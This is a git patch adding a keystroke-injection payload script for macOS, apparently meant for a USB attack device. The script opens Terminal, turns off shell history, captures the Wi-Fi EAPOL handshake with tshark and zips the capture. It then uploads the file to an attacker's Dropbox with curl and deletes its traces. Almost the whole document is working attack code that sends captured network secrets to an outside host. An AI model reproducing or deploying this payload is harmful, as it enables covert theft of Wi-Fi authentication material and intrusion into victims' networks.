From c2441c1f86c2dcbc254fccaed37b371eae449449 Mon Sep 17 00:00:00 2001
From: Narstybits <narstybits@gmail.com>
Date: Fri, 23 Jun 2023 22:54:56 -0500
Subject: [PATCH] Added EAPOL Handshake to Dropbox

---
 Executions/EAPOL Handshake to Dropbox.txt | 74 +++++++++++++++++++++++
 1 file changed, 74 insertions(+)
 create mode 100644 Executions/EAPOL Handshake to Dropbox.txt

diff --git a/Executions/EAPOL Handshake to Dropbox.txt b/Executions/EAPOL Handshake to Dropbox.txt
new file mode 100644
index 0000000..456153e
--- /dev/null
+++ b/Executions/EAPOL Handshake to Dropbox.txt	
@@ -0,0 +1,74 @@
+REM This script discreetly grabs the .PCAP that will contain the FOUR EAPOL handshake keys 
+REM then zips the file renaming it Captured Handshake and sends it directly to your dropbox API.
+REM Replace '<API ACCESS TOKEN>' with your actual API access token.
+
+REM Requirements Wireshark (tshark) can download using the command 'brew install wireshark'
+REM Dropbox API token, you can find Documentation under my Executions readme.
+
+
+REM Author: Narsty
+REM Title: EAPOL Handshake to Dropbox
+REM Version 1.0 MacOs
+REM Category: Execution 
+
+
+ID 05ac:021e Apple:Keyboard
+DELAY 500
+GUI SPACE
+DELAY 500
+STRING terminal
+DELAY 1000
+ENTER
+DELAY 2000 
+STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
+DELAY 500
+ENTER
+DELAY 500
+STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
+DELAY 500
+ENTER
+DELAY 500
+ENTER
+DELAY 500
+STRING  networksetup -setairportpower en0 off
+DELAY 500
+ENTER
+DELAY 5terminal00
+STRING  tshark -i en0 -w ~/Desktop/captured.pcap & 
+DELAY 500
+ENTER
+DELAY 500
+STRING  networksetup -setairportpower en0 on
+DELAY 500
+ENTER 
+DELAY 3000
+STRING  pkill -f tshark
+DELAY 500
+ENTER
+DELAY 500 
+CTRL c
+DELAY 2000
+STRING  echo 'cd ~/Desktop && zip -r "CapturedHandshake.zip" captured.pcap && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer <API ACCESS TOKEN>" -H "Dropbox-API-Arg: {\"path\": \"/Backup/CapturedHandshake.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @"CapturedHandshake.zip"' > upload.sh
+DELAY 500
+ENTER
+DELAY 2500
+ENTER
+STRING  chmod +x upload.sh
+ENTER
+DELAY 500
+STRING  nohup ./upload.sh >/dev/null 2>&1 &
+DELAY 500
+ENTER
+DELAY 4000
+STRING  rm ~/Desktop/captured.pcap
+DELAY 500 
+ENTER
+STRING  rm ~/Desktop/CapturedHandshake.zip
+DELAY 500
+ENTER
+STRING  rm upload.sh
+DELAY 500
+ENTER
+GUI w
+
+